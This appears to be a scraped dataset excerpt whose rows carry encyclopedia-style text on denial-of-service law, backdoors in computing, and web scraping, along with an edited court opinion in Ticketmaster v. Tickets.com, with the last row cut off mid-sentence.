DoS attacks and victims. Many jurisdictions have laws under which denial-of-service attacks are illegal. UNCTAD highlights that 156 countries, or 80% globally, have enacted cybercrime laws to combat its widespread impact. Adoption rates vary by region, with Europe at a 91% rate, and Africa at 72%. 132 On January 7, 2013, Anonymous posted a petition on the whitehouse.gov site asking that DDoS be recognized as a legal form of protest similar to the Occupy protests, the claim being that the similarity in the purpose of both is same. 140 |
268 | https://en.wikipedia.org/wiki/Web_scraping | http://www.tomwbell.com/NetLaw/Ch07/Ticketmaster.html | 2000 WL 525390, 2000 U.S. Dist. LEXIS 12987, Copy. L. Rep. (CCH) P28146 (C.D. Cal., August 10, 2000) (No. CV99 7654 HLH (BQRx)) (unpublished opinion) NOTE: This case has been edited for classroom use by the omission of text and citations. See this alternate source for the full opinion. U.S. District Judge Harry L. Hupp This motion was argued and submitted 7 31 00, at which time the court took it under submission to consider certain of the points made in oral argument. It is now decided as follows. The tentative ruling previously issued should be disregarded. The motion of Ticketmaster Corporation and Ticketmaster Online-Search, Inc. (hereafter collectively Ticketmaster or TM) for preliminary injunction against Tickets.Com, Inc. (hereafter T.Com) is denied. This matter has taken some significant turns since the matter was last here on the motion to dismiss on March 27, 2000. Some of those differences affect consideration of the motion for preliminary injunction. One significant difference is that since the motion to dismiss, TM devised technical methods of blocking direct access by "deep hyperlinking" to TM interior pages. Thus, at the present time, when T.Com hyperlinks to TM, the references is to the TM home page, where the public accessing TM by internet normally starts. However, this may soon change, as discussed below, because TM has now lost the technical means of preventing deep hyperlinking directly to the event web pages. A second major change is a legal development in the form of decision by Judge Whyte of the Northern District in eBay Inc. v. Builder's Edge NDCA'00 100 FSupp2d 1058. This has caused a revamping of the TM trespass theory to attempt to meet the circumstances which led Judge Whyte to issue a preliminary injunction in the eBay case. A third change which the court considers irrelevant to the items to be considered on this motion for preliminary injunction is the filing of an anti-trust counterclaim by T.Com, accompanied by a flurry of documents (mostly press releases) apparently designed to show that TM has been gobbling up competitors and has generally been giving T.Com a competitive hard time in operating at a profit. While these may become important issues at the anti-trust phase of the case, they do not affect the copyright, Lanham Act, or unfair competition issues presented on this injunction motion. The facts governing this preliminary injunction motion have partly been stated in the minute order of March 27 and will not all be repeated here. (In this respect, the court does not intend this to be a published opinion, but rather a minute order announcing a result, and as a result has not written for publication with the usual citation of excess authorities and other attention to grammatical or literary detail. In addition, no pronouncements of legal significance are intended; those come from the Court of Appeals. While the court cannot prevent publication, such is not done with the permission or desire of the court and also with the hope that any typos are corrected.) The essential facts are that TM operates the largest ticket brokerage business in the country. It has exclusive arrangements to sell the tickets for many of the largest entertainment and athletic events in the country. It sells these tickets through a network of about 2900 retail ticket windows, over the telephone, and through the internet. The internet business is the focus of this case. TM maintains a "home" page (www.ticketmaster.com) and has a separate "event" page for each separate event. The typical internet customer accesses the home page and is directed by a series of directories to the particular event page which lists in standardized fashion the basic information about the event (time, place, date, price, seating choices if relevant, and directions on how to order tickets by telephone or directly by interactive internet, presumably using credit cards and how to take delivery UPS, will-call, etc.). The internet business is an increasingly large portion of TM business; the latest figures show about 3,000,000 "hits" a day on the TM home page. TM has a large number of interior event pages which change with additions or modifications of about 35,000 pages per day. This is managed by a set of computers which assign each interior web page a unique electronic address (called a URL) which facilitates the user to reach the precise page for the event in which the user is interested. Aside from the revenue in selling tickets, TM also receives revenue from advertisers who pay based on the number of hits on the page where the advertisement is carried (this is apparently true both of the home page and the event page, since the examples attached show advertisements on both types of pages). The home and event pages carry TM logos, so that the customer cannot be confused by the business entity with which he or she is dealing. The home page contains a statement that the user agrees to the "terms and conditions" of use. One can scroll down to the terms and conditions, which provide, among other things, that use binds one to the terms and conditions, that any use is for the person use of the user, and that no commercial use can be made of the information provided. However, unlike certain other interactive internet programs (see eBay for an example), the user is not required to check an "I agree" box before proceeding to the interior web page wherein is located the information about the particular event in which he or she is interested. T.Com operates in very different fashion. They do, indeed, have certain events in which the directly sell tickets, although very small in number compared to TM. However, their main business appears to operate as a clearing house to provide information as to where tickets to any event may be obtained. Thus, T.Com collects information on as many events as it can, providing its "customer" information on where the tickets may be purchased, whether from T.Com or another source. Where T.Com can sell the tickets itself, it does in a manner similar to TM (phone or internet). However, is also provides information on other sources from which tickets may be purchased. It maintains its own form of event page for each event, listing the basic information (price, date, time, etc.). For the vast number of TM events that it lists, it has a statements that tickets may only be purchased from another ticket broker (not naming TM), and provides a box to check which at the present time will take the user directly by hyperlink to the TM home page. (At the time of the motion to dismiss, the hyperlink took the user directly to the interior web page of TM for the event in question. In the interim, TM found the technical means of preventing this, so the user is now referred directly to the TM home page where he may start wending his way through the directories to the proper interior web page. However at oral argument, counsel inform the court that the technical method of blocking deep hyperlink reference directly to the TM event page is no longer applicable. T.com states that it may soon again start referring users directly to the TM event page by the use of deep hyperlinking.) Any ticket sale is made by TM. The proceeds are not shared by T.Com. T.Com also provides references and a telephone number or hyperlink to brokers who sell the tickets, some of which are auction sellers and some of which are "premium" ticket brokers, pejoratively known as "scalpers. T.Com makes money from advertisers, both on its home page and event page and from whatever ticket business in has of its own. The record does not reveal if it also makes a commission on sales by brokers to whom it refers customers, but not, of course, from TM. The vast amount of information provided by T.Com on TM events comes from TM's computers, monitored by T.Com's computers. Since TM's computer information is open to the public, it is also available to T.Com. However, T.Com does not obtain the information in the same way as does the public (that is, by opening up an interior web page and reading the information off the screen), but rather by a sophisticated computer method of monitoring the thousands of interior TM web pages electronically by the use of a mysterious (to the court) devices known as a "webcrawlers" or "spiders"). The T.Com computers enter the TM computers electronically through the home page and make note of the URL's (electronic addresses) of the interior web pages. They then methodically extract the electronic information from the event page (containing the URL (electronic address of the event web page) price, time, date, place, etc.) and copy it temporarily (for 10 15 seconds) on its own computers. The T.Com programs then extract the purely factual information in the T.Com format on its own web pages. Except for the URL (discussed below), the copied TM web page (or, rather, the electronic signals which, if projected on the screen, would make up what the viewer sees on the screen) are then discarded and not used or retained for any other purpose. Thus, the viewer of the T.Com event web page sees only the T.Com version of the facts. The source of the facts are, of course, the TM event web pages. Now, to approach analysis of these facts from the standpoint of a preliminary injunction: The primary star in the copyright sky for this case is that purely factual information may not be copyrighted. Thus, the time, place, venue, price, etc., of public events are not protected by copyright even if great are and expense is expended in gathering the information (see the possibility of the "hot news" exception discussed below). Thus, unfair as it may seem to TM, the basic facts that it gathers and publishes cannot be protected from copying. To be sure, the manner of expression and format of presenting those facts is protectable, but T.Com has taken great care not to use the TM format and expression in publishing the facts that it takes from TM. . . . In the court's opinion, there are two of TM's theories which demand serious consideration on this motion for preliminary injunction and which may well prove decisive at trial although the court does not now consider them sufficient for a preliminary injunction. They are copyright and the trespass theories. As to copyright, there is undeniably copying of the electronic bits which make up the TM event pages when projected on the screen. Except for the URL, the copying is transitory and temporary and is not used directly in competition with TM, but it is copying and it would violate the Copyright Act if not justified. The fact that irreparable injury is hard to see even with a magnifying glass would not prevent an injunction because of the doctrine that irreparable injury is presumed if there is copying. The copying is intentional and done for commercial purposes even if the copied material is not sold as that of the copier. The copying, as summarized above, takes place as a part of the process of taking the (unprotectable) facts from TM's web sites so as to turn those facts into facts published by T.Com in its own format. At oral argument, counsel explained that by the nature of the way computers work, it is necessary to copy the electronic signals temporarily on the copying computer's RAM in order to extract the factual data present thereon. It is, therefore, a necessary part of the process by which T.Com efficiently takes basic facts from the TM websites, retains the electronic signals from TM on its own computer for a few second, during which T.Com's own computer program strips the signals of the basic facts, and then discards the copied electronic signals of TM as of no further use (except for the URL, discussed below). What prevents the issuance of a preliminary injunction on these facts is the "fair use" doctrine as recognized by the Ninth Circuit in Connectix Corp. 9Cir'00 203 F3d 596 and certain prior cases. Connectix holds that copying for reverse engineering to obtain non-protectable information is permitted by the fair use doctrine in certain circumstances. Reverse engineering to get at unprotected functional elements is not the same process as used here but the analogy seems to apply. The copy is not used competitively. It is destroyed after its limited function is done. It is used only to facilitate obtaining non-protectable data here the basic factual data. It may not be the only way of obtaining that data (i.e., a thousand scriveners with pencil and paper could do the job given time), but it is the most efficient way, not held to be an impediment in Connectix. TM makes the point that copying the URL (the electronic address to the web pages) which is not destroyed, but retained and used, is copying protected material. The court doubts that the material is protectable because the URL appears to contain functional and factual elements only and not original material. It appears likely to the court that plaintiff's odds on prevailing on the fair use doctrine at trial are sufficiently low that a preliminary injunction should not be granted even with the presumption of irreparable injury which goes with copyright infringement. The other point dealing with copyright is the so-called "hot news" exception. As a basic exception to the rule that factual information is not protectable, an exception developed in the case of competing news organizations selling news to customers (newspapers) in competition with one another. Certain protections were allowed to prevent wholesale thievery of news by one organization from another. Here, it is suggested that at least some of the event news is "hot" that is, the event is sold out within hours or minutes of the tickets becoming available. This exception is not made out here. Even if such a hot event occurs (the court is informally informed that this is not rare) in a TM controlled event, the reference for ticket sales will be to TM, who sells the tickets in any event. Second, there is no showing that this situation occurs often enough to be of commercial significance. Accordingly, a preliminary injunction will not be issued on the copyright aspects of the case. There could be a difference at trial, and the difference could depend on the necessity of downloading the electronic signals onto the T.Com computers for purposes of extracting the unprotected factual information. The trespass aspects of the case have taken on new significance in the light of Judge Whyte's opinion in eBay on May 24, which was immediately followed by a deluge of additional papers in this court. It must be said that the trespass question presented and decided in eBay bore no resemblance to the trespass questions considered by this court on the motion to dismiss last March. What this court decided (at least, what it thought it decided) was that the taking of factual information from a public source was not a trespass, and if taking the information from a publically sic available computer was a state law trespass, it fell afoul of the presumption aspects of the Copyright Act. However, no question of invasion of the computer by spiders, and possible consequent damage to the computer was presented to this court at least no such question was decided. So, defendant's argument that it has already been decided and is law of the case and plaintiff's argument that the court can always reconsider a wrong decision have no place it is a new one to this court. The court is impressed by the original and resourceful thinking of Judge Whyte; it is always difficult to attempt to apply established law to brand new facts with other established policies tugging and pulling one in various directions. Not only that, the court agrees with much of what Judge Whyte says. The computer is a piece of tangible personal property. It is operated by mysterious electronic impulses which did not exist when the law of trespass to chattels was developed, but the principles should not be too different. If the electronic impulses can do damage to the computer or to its function in a comparable way to taking a hammer to a piece of machinery, then it is no stretch to recognize that damage as trespass to chattels and provide a legal remedy for it. Judge Whyte in eBay found the damage in the occupation of a portion of the capacity of the computer to handle routine business and conjectured that approval of that use would bring many more parasitic like copies of the defendant feeding that computer to a clogged level upon the information expensively developed by eBay, the net result likely being severe damage to the function of the computer and thus the business of eBay. Thus, the injunction was issued to prevent the use of the spiders by the defendant in that case. It is noted that the harm to the equipment was foreseen to its intended function, not the physical characteristics of the computer. A basic element of trespass to chattels must be physical harm to the chattel (not present here) or some obstruction of its basic function (in the court's opinion not sufficiently shown here). TM has presented statistics showing an estimate of the number of hits by T.Com spiders in its own computers and has presented rough comparison with the total use of the computers by all users of the computers. The comparative use by T.Com appears very small and there is no showing that the use interferes to any extent with the regular business of TM. If it did, an injunction might well issue, but should not with a showing of lack of harm or foreseeable harm. Nor here is the specture sic of dozens or more parasites joining the fray, the cumulative total of which could affect the operation of TM's business. Further, the showing here is that the effect of T.Com's taking of factual data from TM is not to operate in direct competition with TM it is not selling the data or the tickets. While TM sees some detriment in T.Com's operation (possibly in the loss of advertising revenue), there is also a beneficial effect in the referral of customers looking for tickets to TM events directly to TM. (In fact, other companies, who presumably pay a fee, are allowed to refer customers directly to the internal web pages of TM, presumably leading to sale of TM tickets despite hypothetical loss of advertising revenue by not going through the TM home web page.) Accordingly, while the trespass theory has some merit, there is insufficient proof of its elements in this case to justify a preliminary injunction. Further, there appears to be a lack of irreparable injury (required for this theory). The remaining contentions may be disposed of with fewer words. The contract theory lacks sufficient proof of agreement by defendant to be taken seriously as a ground for preliminary injunction. Besides, a preliminary injunction to prevent a breach of contract is an almost unheard of thing, being the equivalent of specific enforcement by preliminary injunction. There is insufficient irreparable injury to even consider such a proposition. The various Lanham Act theories lack sufficient facts to support them. T.Com does not pass itself off as TM. In fact, it carefully says that it cannot sell the tickets but will refer the buyer to another broker (here, read TM) who can. The customer ends up on the TM home web page filed with TM logos. The customer is unlikely to be misled. Neither is there evidence of reverse palming off. T.Com in no way pretends that it is TM or acting for it. The false advertising claim is supported by a few mistakes in phone numbers, etc., which appear to be stray errors. This is not worth an injunction. The other claims appear to have no basis worthy of an injunction. Preliminary injunction denied. |
269 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Backdoor_(computing) | A backdoor is a typically covert method of bypassing normal authentication or encryption in a computer, product, embedded device (e.g. a home router), or its embodiment (e.g. part of a cryptosystem, algorithm, chipset, or even a "homunculus computer"—a tiny computer-within-a-computer such as that found in Intel's AMT technology). 1 2 Backdoors are most often used for securing remote access to a computer, or obtaining access to plaintext in cryptosystems. From there it may be used to gain access to privileged information like passwords, corrupt or delete data on hard drives, or transfer information within autoschediastic networks. A backdoor may take the form of a hidden part of a program, 3 a separate program (e.g. Back Orifice may subvert the system through a rootkit), code in the firmware of the hardware, 4 or parts of an operating system such as Windows. 5 6 7 Trojan horses can be used to create vulnerabilities in a device. A Trojan horse may appear to be an entirely legitimate program, but when executed, it triggers an activity that may install a backdoor. 8 Although some are secretly installed, other backdoors are deliberate and widely known. These kinds of backdoors have "legitimate" uses such as providing the manufacturer with a way to restore user passwords. Many systems that store information within the cloud fail to create accurate security measures. If many systems are connected within the cloud, hackers can gain access to all other platforms through the most vulnerable system. 9 Default passwords (or other default credentials) can function as backdoors if they are not changed by the user. Some debugging features can also act as backdoors if they are not removed in the release version. 10 In 1993, the United States government attempted to deploy an encryption system, the Clipper chip, with an explicit backdoor for law enforcement and national security access. The chip was unsuccessful. 11 Recent proposals to counter backdoors include creating a database of backdoors' triggers and then using neural networks to detect them. 12 The threat of backdoors surfaced when multiuser and networked operating systems became widely adopted. Petersen and Turn discussed computer subversion in a paper published in the proceedings of the 1967 AFIPS Conference. 13 They noted a class of active infiltration attacks that use "trapdoor" entry points into the system to bypass security facilities and permit direct access to data. The use of the word trapdoor here clearly coincides with more recent definitions of a backdoor. However, since the advent of public key cryptography the term trapdoor has acquired a different meaning (see trapdoor function), and thus the term "backdoor" is now preferred, only after the term trapdoor went out of use. More generally, such security breaches were discussed at length in a RAND Corporation task force report published under DARPA sponsorship by J.P. Anderson and D.J. Edwards in 1970. 14 While initially targeting the computer vision domain, backdoor attacks have expanded to encompass various other domains, including text, audio, ML-based computer-aided design, and ML-based wireless signal classification. Additionally, vulnerabilities in backdoors have been demonstrated in deep generative models, reinforcement learning (e.g., AI GO), and deep graph models. These broad-ranging potential risks have prompted concerns from national security agencies regarding their potentially disastrous consequences. 15 A backdoor in a login system might take the form of a hard coded user and password combination which gives access to the system. An example of this sort of backdoor was used as a plot device in the 1983 film WarGames, in which the architect of the "WOPR" computer system had inserted a hardcoded password-less account which gave the user access to the system, and to undocumented parts of the system (in particular, a video game-like simulation mode and direct interaction with the artificial intelligence). Although the number of backdoors in systems using proprietary software (software whose source code is not publicly available) is not widely credited, they are nevertheless frequently exposed. Programmers have even succeeded in secretly installing large amounts of benign code as Easter eggs in programs, although such cases may involve official forbearance, if not actual permission. There are a number of cloak and dagger considerations that come into play when apportioning responsibility. Covert backdoors sometimes masquerade as inadvertent defects (bugs) for reasons of plausible deniability. In some cases, these might begin life as an actual bug (inadvertent error), which, once discovered are then deliberately left unfixed and undisclosed, whether by a rogue employee for personal advantage, or with C-level executive awareness and oversight. It is also possible for an entirely above-board corporation's technology base to be covertly and untraceably tainted by external agents (hackers), though this level of sophistication is thought to exist mainly at the level of nation state actors. For example, if a photomask obtained from a photomask supplier differs in a few gates from its photomask specification, a chip manufacturer would be hard-pressed to detect this if otherwise functionally silent; a covert rootkit running in the photomask etching equipment could enact this discrepancy unbeknown to the photomask manufacturer, either, and by such means, one backdoor potentially leads to another. note 1 In general terms, the long dependency-chains in the modern, highly specialized technological economy and innumerable human-elements process control-points make it difficult to conclusively pinpoint responsibility at such time as a covert backdoor becomes unveiled. Even direct admissions of responsibility must be scrutinized carefully if the confessing party is beholden to other powerful interests. Many computer worms, such as Sobig and Mydoom, install a backdoor on the affected computer (generally a PC on broadband running Microsoft Windows and Microsoft Outlook). Such backdoors appear to be installed so that spammers can send junk e-mail from the infected machines. Others, such as the Sony BMG rootkit, placed secretly on millions of music CDs through late 2005, are intended as DRM measures—and, in that case, as data-gathering agents, since both surreptitious programs they installed routinely contacted central servers. A sophisticated attempt to plant a backdoor in the Linux kernel, exposed in November 2003, added a small and subtle code change by subverting the revision control system. 16 In this case, a two-line change appeared to check root access permissions of a caller to the sys wait4 function, but because it used assignment instead of equality checking , it actually granted permissions to the system. This difference is easily overlooked, and could even be interpreted as an accidental typographical error, rather than an intentional attack. 17 18 In January 2014, a backdoor was discovered in certain Samsung Android products, like the Galaxy devices. The Samsung proprietary Android versions are fitted with a backdoor that provides remote access to the data stored on the device. In particular, the Samsung Android software that is in charge of handling the communications with the modem, using the Samsung IPC protocol, implements a class of requests known as remote file server (RFS) commands, that allows the backdoor operator to perform via modem remote I O operations on the device hard disk or other storage. As the modem is running Samsung proprietary Android software, it is likely that it offers over-the-air remote control that could then be used to issue the RFS commands and thus to access the file system on the device. 19 Harder to detect backdoors involve modifying object code, rather than source code—object code is much harder to inspect, as it is designed to be machine-readable, not human-readable. These backdoors can be inserted either directly in the on-disk object code, or inserted at some point during compilation, assembly linking, or loading—in the latter case the backdoor never appears on disk, only in memory. Object code backdoors are difficult to detect by inspection of the object code, but are easily detected by simply checking for changes (differences), notably in length or in checksum, and in some cases can be detected or analyzed by disassembling the object code. Further, object code backdoors can be removed (assuming source code is available) by simply recompiling from source on a trusted system. Thus for such backdoors to avoid detection, all extant copies of a binary must be subverted, and any validation checksums must also be compromised, and source must be unavailable, to prevent recompilation. Alternatively, these other tools (length checks, diff, checksumming, disassemblers) can themselves be compromised to conceal the backdoor, for example detecting that the subverted binary is being checksummed and returning the expected value, not the actual value. To conceal these further subversions, the tools must also conceal the changes in themselves—for example, a subverted checksummer must also detect if it is checksumming itself (or other subverted tools) and return false values. This leads to extensive changes in the system and tools being needed to conceal a single change. As object code can be regenerated by recompiling (reassembling, relinking) the original source code, making a persistent object code backdoor (without modifying source code) requires subverting the compiler itself—so that when it detects that it is compiling the program under attack it inserts the backdoor—or alternatively the assembler, linker, or loader. As this requires subverting the compiler, this in turn can be fixed by recompiling the compiler, removing the backdoor insertion code. This defense can in turn be subverted by putting a source meta-backdoor in the compiler, so that when it detects that it is compiling itself it then inserts this meta-backdoor generator, together with the original backdoor generator for the original program under attack. After this is done, the source meta-backdoor can be removed, and the compiler recompiled from original source with the compromised compiler executable: the backdoor has been bootstrapped. This attack dates to a 1974 paper by Karger and Schell, 20 and was popularized in Thompson's 1984 article, entitled "Reflections on Trusting Trust"; 21 it is hence colloquially known as the "Trusting Trust" attack. See compiler backdoors, below, for details. Analogous attacks can target lower levels of the system, such as the operating system, and can be inserted during the system booting process; these are also mentioned by Karger and Schell in 1974, and now exist in the form of boot sector viruses. 20 22 A traditional backdoor is a symmetric backdoor: anyone that finds the backdoor can in turn use it. The notion of an asymmetric backdoor was introduced by Adam Young and Moti Yung in the Proceedings of Advances in Cryptology Crypto '96. An asymmetric backdoor can only be used by the attacker who plants it, even if the full implementation of the backdoor becomes public (e.g. via publishing, being discovered and disclosed by reverse engineering, etc.). Also, it is computationally intractable to detect the presence of an asymmetric backdoor under black-box queries. This class of attacks have been termed kleptography; they can be carried out in software, hardware (for example, smartcards), or a combination of the two. The theory of asymmetric backdoors is part of a larger field now called cryptovirology. Notably, NSA inserted a kleptographic backdoor into the Dual EC DRBG standard. 4 23 24 There exists an experimental asymmetric backdoor in RSA key generation. This OpenSSL RSA backdoor, designed by Young and Yung, utilizes a twisted pair of elliptic curves, and has been made available. 25 A sophisticated form of black box backdoor is a compiler backdoor, where not only is a compiler subverted—to insert a backdoor in some other program, such as a login program—but it is further modified to detect when it is compiling itself and then inserts both the backdoor insertion code (targeting the other program) and the code-modifying self-compilation, like the mechanism through which retroviruses infect their host. This can be done by modifying the source code, and the resulting compromised compiler (object code) can compile the original (unmodified) source code and insert itself: the exploit has been boot-strapped. This attack was originally presented in Karger Schell (1974), note 2 which was a United States Air Force security analysis of Multics, where they described such an attack on a PL I compiler, and call it a "compiler trap door". They also mention a variant where the system initialization code is modified to insert a backdoor during booting, as this is complex and poorly understood, and call it an "initialization trapdoor"; this is now known as a boot sector virus. 22 This attack was then actually implemented by Ken Thompson, and popularized in his Turing Award acceptance speech in 1983, "Reflections on Trusting Trust", 21 which points out that trust is relative, and the only software one can truly trust is code where every step of the bootstrapping has been inspected. This backdoor mechanism is based on the fact that people only review source (human-written) code, and not compiled machine code (object code). A program called a compiler is used to create the second from the first, and the compiler is usually trusted to do an honest job. Thompson's paper 21 describes a modified version of the Unix C compiler that would put an invisible backdoor in the Unix login command when it noticed that the login program was being compiled, and would also add this feature undetectably to future compiler versions upon their compilation as well. As the compiler itself was a compiled program, users would be extremely unlikely to notice the machine code instructions that performed these tasks. (Because of the second task, the compiler's source code would appear "clean".) What's worse, in Thompson's proof of concept implementation, the subverted compiler also subverted the analysis program (the disassembler), so that anyone who examined the binaries in the usual way would not actually see the real code that was running, but something else instead. Karger and Schell gave an updated analysis of the original exploit in 2002, and, in 2009, Wheeler wrote a historical overview and survey of the literature. note 3 In 2023, Cox published an annotated version of Thompson's backdoor source code. 27 Thompson's version was, officially, never released into the wild. However, it is believed that a version was distributed to BBN and at least one use of the backdoor was recorded. note 4 There are scattered anecdotal reports of such backdoors in subsequent years. In August 2009, an attack of this kind was discovered by Sophos labs. The W32 Induc-A virus infected the program compiler for Delphi, a Windows programming language. The virus introduced its own code to the compilation of new Delphi programs, allowing it to infect and propagate to many systems, without the knowledge of the software programmer. The virus looks for a Delphi installation, modifies the SysConst.pas file, which is the source code of a part of the standard library and compiles it. After that, every program compiled by that Delphi installation will contain the virus. An attack that propagates by building its own Trojan horse can be especially hard to discover. It resulted in many software vendors releasing infected executables without realizing it, sometimes claiming false positives. After all, the executable was not tampered with, the compiler was. It is believed that the Induc-A virus had been propagating for at least a year before it was discovered. note 5 In 2015, a malicious copy of Xcode, XcodeGhost, also performed a similar attack and infected iOS apps from a dozen of software companies in China. Globally, 4,000 apps were found to be affected. It was not a true Thompson Trojan, as it does not infect development tools themselves, but it did prove that toolchain poisoning can cause substantial damages. 30 Once a system has been compromised with a backdoor or Trojan horse, such as the Trusting Trust compiler, it is very hard for the "rightful" user to regain control of the system typically one should rebuild a clean system and transfer data (but not executables) over. However, several practical weaknesses in the Trusting Trust scheme have been suggested. For example, a sufficiently motivated user could painstakingly review the machine code of the untrusted compiler before using it. As mentioned above, there are ways to hide the Trojan horse, such as subverting the disassembler; but there are ways to counter that defense, too, such as writing a disassembler from scratch. citation needed A generic method to counter trusting trust attacks is called diverse double-compiling. The method requires a different compiler and the source code of the compiler-under-test. That source, compiled with both compilers, results in two different stage 1 compilers, which however should have the same behavior. Thus the same source compiled with both stage 1 compilers must then result in two identical stage 2 compilers. A formal proof is given that the latter comparison guarantees that the purported source code and executable of the compiler-under-test correspond, under some assumptions. This method was applied by its author to verify that the C compiler of the GCC suite (v. 3.0.4) contained no trojan, using icc (v. 11.0) as the different compiler. 26 In practice such verifications are not done by end users, except in extreme circumstances of intrusion detection and analysis, due to the rarity of such sophisticated attacks, and because programs are typically distributed in binary form. Removing backdoors (including compiler backdoors) is typically done by simply rebuilding a clean system. However, the sophisticated verifications are of interest to operating system vendors, to ensure that they are not distributing a compromised system, and in high-security settings, where such attacks are a realistic concern. |
270 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-3 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users 